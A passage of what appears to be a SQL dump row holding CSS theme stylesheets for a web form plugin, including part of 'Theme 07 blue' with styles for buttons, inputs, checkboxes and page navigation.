border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 66px;\r\n	height: 49px;\r\n	background: url([SITE_ROOT]/images/06/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #473C34;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/06/01/next.png) no-repeat right #6BD86B;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #459B45;\r\n}\r\n\r\n.next-page div.wdform-page-button:hover {\r\n	background:url([SITE_ROOT]/images/06/01/next.png) no-repeat right #90EE90;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #959595;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #E8E8E8;\r\n}\r\n.previous-page div.wdform-page-button:before {\r\n	content: \" \";\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left;\r\n	height: 19px;\r\n	width: 20px;\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	top: -2px;\r\n	position: relative;\r\n}\r\n.button-submit {\r\ncolor: #473C34;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 35px;\r\nline-height: 35px;\r\nbackground: #6BD86B;\r\npadding: 0px 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder: 1px solid #459B45;\r\n}\r\n.button-submit:hover {\r\n	background: #90EE90;\r\n}\r\n.button-reset {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #959595;\r\n	margin-left: 5px;\r\n}\r\n.button-reset:hover {\r\n	background: #E8E8E8;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_section_break2{\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #6BD86B ;\r\n	color: #030303;\r\n	font-size: 16px;\r\n	text-align: left;\r\npadding: 7px 30px 10px;\r\n}\r\n\r\n.wdform_section_break2:after {\r\n	content: \" \" ;\r\n	position: relative;\r\n	width: 16px;\r\n	height: 13px;\r\n	top: -3px;\r\n	left: 1px;\r\n	box-shadow: 0px 7px 2px #c9c9c9;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\n	margin: 16px 10px 16px 0px;\r\ncolor:#4C4C4C;\r\n	font-size: 16px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 5px;\r\n	height: 27px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ABAAAA;\r\nbackground: transparent;\r\ncolor: #5C5C5C;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type=\"password\"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ntextarea {\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border: 1px solid #6BD86B ;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border: 1px solid #6BD86B  ;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #6BD86B ;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #6BD86B ;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/06/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\nbox-shadow: 0px 3px 9px 1px rgb(218, 218, 218) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #4C4C4C;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #4C4C4C;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #342114;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #90EE90;\r\n	margin-right: 1px;\r\n}\r\n.page_active {\r\n	color: #342114;\r\n	cursor: pointer;\r\n	background-color: #6BD86B;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 20px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-right: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #72DB72 ;\r\n	background: -moz-linear-gradient(left, #8FEB8F 0%, #5CF35C 39%, #72DB72 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #8FEB8F ), color-stop(39%, #5CF35C ), color-stop(100%, #72DB72 ));\r\n	background: -o-linear-gradient(left, #8FEB8F 0%, #5CF35C 39%, #72DB72 100%);\r\nbackground: -ms-linear-gradient(left, #8FEB8F 0%, #5CF35C 39%, #72DB72 100%);\r\nbackground: -webkit-linear-gradient(left, #8FEB8F 0%, #5CF35C 39%, #72DB72 100%);\r\n\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\nbackground-color: #E0E0E0;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: left !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #473C34;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #ffffff;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 23px;\r\n	height: 23px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #ABAAAA !important;\r\n}',0),(24,'Theme 07 blue','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #0072A2;\r\nmargin-bottom: 10px;\r\ncolor: #0072A2;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #A4A4A4;\r\n	border: 1px solid #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F1F1F1 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #696969;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F1F1F1;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/07/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/next.png) no-repeat right #0072A2;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border-right: 1px solid #CECECE;\r\n} \r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #0072A2;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #267EA9;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #267EA9;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F1F1F1;\r\nborder: 1px solid transparent;\r\ncolor: #696969;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type=\"password\"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: 